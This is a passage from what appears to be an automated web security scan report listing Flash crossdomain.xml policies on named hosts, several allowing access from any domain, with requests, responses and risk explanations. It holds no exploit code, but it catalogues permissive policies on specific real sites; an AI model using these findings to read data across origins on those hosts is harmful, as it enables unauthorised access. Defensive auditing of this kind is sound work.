Expires: Thu, 08 Sep 2011 14:14:09 GMT
Content-Type: text/xml
Content-Length: 207
Date: Wed, 07 Sep 2011 14:14:09 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

3.35. http://pt200194.unica.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pt200194.unica.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pt200194.unica.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 28 Jul 2010 19:24:08 GMT
ETag: "60471-107-48c778fc6a600"
Accept-Ranges: bytes
Content-Length: 263
P3P: CP="NOI DSP COR PSA ADMa DEVa OUR IND OTC"
Content-Type: text/xml
Expires: Wed, 07 Sep 2011 14:14:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:14:36 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.36. http://s0.2mdn.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Tue, 06 Sep 2011 18:56:30 GMT
Expires: Wed, 07 Sep 2011 18:56:30 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 69528

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.37. http://s1.2mdn.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s1.2mdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s1.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Tue, 06 Sep 2011 18:57:19 GMT
Expires: Wed, 07 Sep 2011 18:57:19 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 69487

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.38. http://secure-au.imrworldwide.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-au.imrworldwide.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-au.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:32 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Wed, 14 Sep 2011 14:14:32 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

3.39. http://statse.webtrendslive.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://statse.webtrendslive.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:6eb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 14:14:15 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.40. http://sync.mathtag.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sync.mathtag.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: sync.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xc95 3221
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

3.41. http://tags.bluekai.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Wed, 07 Sep 2011 14:14:26 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT
ETag: "6803d3-ca-4a6e0af03f580"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

3.42. http://www.7perth.com.au/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.7perth.com.au
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.7perth.com.au

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Wed, 07 Sep 2011 14:14:19 GMT
ETag: "2246f-64-4aa4f0e5de917"
Last-Modified: Fri, 12 Aug 2011 13:40:27 GMT
Server: Apache/2.2.16 (Amazon)
Content-Length: 100
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

3.43. http://www.abc.net.au/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.abc.net.au

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 31 Aug 2011 06:56:20 GMT
ETag: "16037c5-842-a01ded00"
Content-Type: text/xml
Expires: Wed, 07 Sep 2011 14:14:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 07 Sep 2011 14:14:12 GMT
Content-Length: 2114
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.abc.net.au" />
...[SNIP]...
<allow-access-from domain="abc.net.au" />
   <allow-access-from domain="*.usmob.com.au"/>
   <allow-access-from domain="usmob.com.au"/>
   <allow-access-from domain="rollermache.net" />
   <allow-access-from domain="www.rollermache.net" />
   <allow-access-from domain="www.abctv.net.au" />
   <allow-access-from domain="*.radioaustralia.net.au" />
   <allow-access-from domain="*.bayvut.com" />
   <allow-access-from domain="radioaustralia.net.au" />
   <allow-access-from domain="bayvut.com" />
   <allow-access-from domain="www.radioaustralia.net.au" />
   <allow-access-from domain="www.bayvut.com" />
   <allow-access-from domain="serve.a-feed.com" />
   <allow-access-from domain="220.233.4.205" />
   <allow-access-from domain="*.220.233.4.205" />
   <allow-access-from domain="www.gruen2.thefeds.com.au" />
   <allow-access-from domain="gruen2.thefeds.com.au" />
   <allow-access-from domain="wildspace.tv" />
   <allow-access-from domain="wildspace.thefeds.com.au" />
   <allow-access-from domain="*" />
   <allow-access-from domain=" moteldeception.thefeds.com.au "/>
   <allow-access-from domain="australianetwork.com" />
   <allow-access-from domain="www.australianetwork.com" />
   <allow-access-from domain="*.australianetwork.com" />
   <allow-access-from domain="australianetworkblogs.com" />
   <allow-access-from domain="*.australianetworkblogs.com" />
   <allow-access-from domain="*.sportsflash.com.au" />
   <allow-access-from domain="*.cadability.com.au" />
   <allow-access-from domain="*.abceducation.net.au" />
   <allow-access-from domain="pluck.abc.net.au" />
   <allow-access-from domain="pluck2.abc.net.au" />
   <allow-access-from domain="pluckstage.abc.net.au" />
   <allow-access-from domain="pluck2stage.abc.net.au" />
...[SNIP]...

3.44. http://www.weatherchannel.com.au/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.weatherchannel.com.au
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.weatherchannel.com.au

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: text/xml
Date: Wed, 07 Sep 2011 14:14:55 GMT
ETag: "315d9e4f6c82ca1:0"
Connection: close
Last-Modified: Mon, 21 Dec 2009 18:35:03 GMT
X-Powered-By: ASP.NET
X-Cache-Info: caching
Content-Length: 109

...<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

3.45. http://yql.yahooapis.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://yql.yahooapis.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: yql.yahooapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Date: Wed, 07 Sep 2011 14:18:18 GMT
Server: YTS/1.19.8
Age: 0

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

3.46. http://adadvisor.net/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://adadvisor.net
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:51 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 478
Content-Type: Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
<allow-access-from domain="*.tidaltv.com" />
...[SNIP]...

3.47. http://ads.adbrite.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.adbrite.com

Response

HTTP/1.0 200 OK
Accept-Ranges: none
Content-Type: text/x-cross-domain-policy
Date: Wed, 07 Sep 2011 14:16:07 GMT
Server: XPEHb/1.0
Content-Length: 398
Connection: close

<?xml version="1.0" encoding="UTF-8"?>

<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

3.48. http://api.tweetmeme.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://api.tweetmeme.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: api.tweetmeme.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Wed, 07 Sep 2011 14:18:57 GMT
Content-Type: text/xml; charset='utf-8'
Connection: close
P3P: CP="CAO PSA"
Expires: Wed, 07 Sep 2011 14:21:17 +0000 GMT
Etag: 336a6454235e3e8eb7a514ed6046bb68
X-Served-By: vanga

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.break.com" secure="true"/><allow-access-from domain="*.nextpt.com" secure="true"/>
...[SNIP]...

3.49. http://au.adserver.yahoo.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://au.adserver.yahoo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: au.adserver.yahoo.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:34 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 01 Sep 2011 16:38:40 GMT
Accept-Ranges: bytes
Content-Length: 2190
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.sueddeutsche.de" />
<allow-access-from domain="*.ooyala.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.auditude.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.comcastonline.com" />
<allow-access-from domain="*.flickr.com" />
<allow-access-from domain="*.grindtv.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.maven.net" />
<allow-access-from domain="*.mavenapps.net" />
<allow-access-from domain="*.maventechnologies.com" />
<allow-access-from domain="*.mlb.com" />
<allow-access-from domain="*.overture.com" />
<allow-access-from domain="*.rivals.com" />
<allow-access-from domain="*.scrippsnewspapers.com" />
<allow-access-from domain="*.vmixcore.com" />
<allow-access-from domain="*.vmix.com" />
<allow-access-from domain="*.vipix.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="www.comcast.net" />
<allow-access-from domain="dpbaseball.comcast.net" />
<allow-access-from domain="fantasysports.comcast.net" />
<allow-access-from domain="finance.comcast.net" />
<allow-access-from domain="horoscope.comcast.net" />
<allow-access-from domain="sz0005.wc.mail.comcast.net" />
<allow-access-from domain="games.comcast.net" />
<allow-access-from domain="community.comcast.net" />
<allow-access-from domain="player.sambatech.com.br" />
<allow-access-from domain="*.zope.net" />
<allow-access-from domain="*muzu.tv" />
<allow-access-from domain="*movieclips.com" />
<allow-access-from domain="*.adap.tv" />
<allow-access-from domain="*.viki.com" />
<allow-access-from domain="*.vikistaging.net" />
<allow-access-from domain="vikiplayerdemo.heroku.com" />
<allow-access-from domain="*.btrll.com" />
<allow-access-from domain="cdn.visiblemeasures.com" />
...[SNIP]...

3.50. http://au.news.yahoo.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://au.news.yahoo.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: au.news.yahoo.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:37 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Wed, 10 Mar 2010 23:40:51 GMT
Accept-Ranges: bytes
Content-Length: 983
Connection: close
Content-Type: application/x-httpd-php

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.51. http://au.pfinance.yahoo.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://au.pfinance.yahoo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: au.pfinance.yahoo.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:56 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Wed, 10 Mar 2010 23:40:51 GMT
Accept-Ranges: bytes
Content-Length: 983
Connection: close
Content-Type: application/x-httpd-php

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

3.52. http://cm.au.thewest.overture.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://cm.au.thewest.overture.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cm.au.thewest.overture.com

Response

3.53. http://cookex.amp.yahoo.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://cookex.amp.yahoo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cookex.amp.yahoo.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:09 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 14 May 2010 21:53:13 GMT
Accept-Ranges: bytes
Content-Length: 1548
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
...[SNIP]...
<allow-access-from domain="*.sueddeutsche.de" />
<allow-access-from domain="*.ooyala.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.auditude.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.mavenapps.net" />
<allow-access-from domain="*.maventechnologies.com" />
<allow-access-from domain="*.grindtv.com" />
<allow-access-from domain="*.vipix.com" />
<allow-access-from domain="*.maven.net" />
<allow-access-from domain="*.mlb.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.comcastonline.com" />
<allow-access-from domain="*.flickr.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.overture.com" />
<allow-access-from domain="*.rivals.com" />
<allow-access-from domain="*.scrippsnewspapers.com" />
<allow-access-from domain="*.vmixcore.com" />
<allow-access-from domain="*.vmix.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.yimg.com" />
...[SNIP]...

3.54. http://courses.mycareer.com.au/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://courses.mycareer.com.au
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: courses.mycareer.com.au
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/2878385/jb_education_190411.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.3
Date: Wed, 07 Sep 2011 14:18:07 GMT
Content-Type: text/xml
Last-Modified: Tue, 17 May 2011 03:48:20 GMT
Connection: keep-alive
Expires: Fri, 07 Oct 2011 14:18:07 GMT
Cache-Control: max-age=2592000
Content-Length: 407

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s0.2mdn.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.smh.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="addemo.f2.com.au" secure="true" to-ports="*"/>
...[SNIP]...

3.55. http://feeds.mycareer.com.au/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://feeds.mycareer.com.au
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.1
Host: feeds.mycareer.com.au
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/2878385/jb_180x60_190411.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=10800
Content-Length: 392
Content-Type: text/xml
Content-Location: http://feeds.mycareer.com.au/crossdomain.xml
Last-Modified: Fri, 26 Aug 2011 04:55:30 GMT
Accept-Ranges: bytes
ETag: "0cd261ac63cc1:0"
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Date: Wed, 07 Sep 2011 14:17:25 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s0.2mdn.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.smh.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="addemo.f2.com.au" secure="true" to-ports="*"/>
...[SNIP]...

3.56. http://media.perthnow.com.au/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://media.perthnow.com.au
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: media.perthnow.com.au

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "0331dfe0f891a41f0980259a1864f506:1271030068"
Last-Modified: Sun, 11 Apr 2010 23:54:28 GMT
Accept-Ranges: bytes
Content-Length: 1823
Content-Type: application/xml
Date: Wed, 07 Sep 2011 14:14:40 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*.news.com.au"/>
   <allow-access-from domain="*.foxsports.com.au"/>
   <allow-access-from domain="*.perthnow.com.au"/>
   <allow-access-from domain="*.theaustralian.com.au"/>
   <allow-access-from domain="*.dailytelegraph.com.au"/>
   <allow-access-from domain="*.heraldsun.com.au"/>
   <allow-access-from domain="*.couriermail.com.au"/>
   <allow-access-from domain="*.adelaidenow.com.au"/>
   <allow-access-from domain="*.themercury.com.au"/>
   <allow-access-from domain="*.ntnews.com.au"/>
   <allow-access-from domain="*.roo.com"/>
   <allow-access-from domain="*.carsguide.com.au"/>
   <allow-access-from domain="*.tiser.com.au"/>
   <allow-access-from domain="*.vogue.com.au"/>
   <allow-access-from domain="*.newsdigitalmedia.com.au"/>
   <allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="67.228.97.188/flashcms"/>
   <allow-access-from domain="208.43.130.232/flashcms"/>

   <allow-access-from domain="pst-pndev.*" />
   <allow-access-from domain="online.wsj.com" />

   <allow-access-from domain="*.nova1069.com.au"/>
   <allow-access-from domain="*.nova937.com.au" />
   <allow-access-from domain="*.nova1069.com.au"/>
   <allow-access-from domain="*.nova969.com.au"/>
   <allow-access-from domain="*.nova100.com.au"/>
   <allow-access-from domain="*.nova919.com.au"/>
   <allow-access-from domain="*.pickyanova.com.au"/>
   <allow-access-from domain="*.novafm.com.au"/>

   <allow-access-from domain="*.studentedge.com.au"/>
...[SNIP]...

3.57. http://optimized-by.rubiconproject.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:10 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

3.58. http://pagead2.googlesyndication.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://pagead2.googlesyndication.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Tue, 06 Sep 2011 18:56:53 GMT
Expires: Wed, 07 Sep 2011 18:56:53 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 69455

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
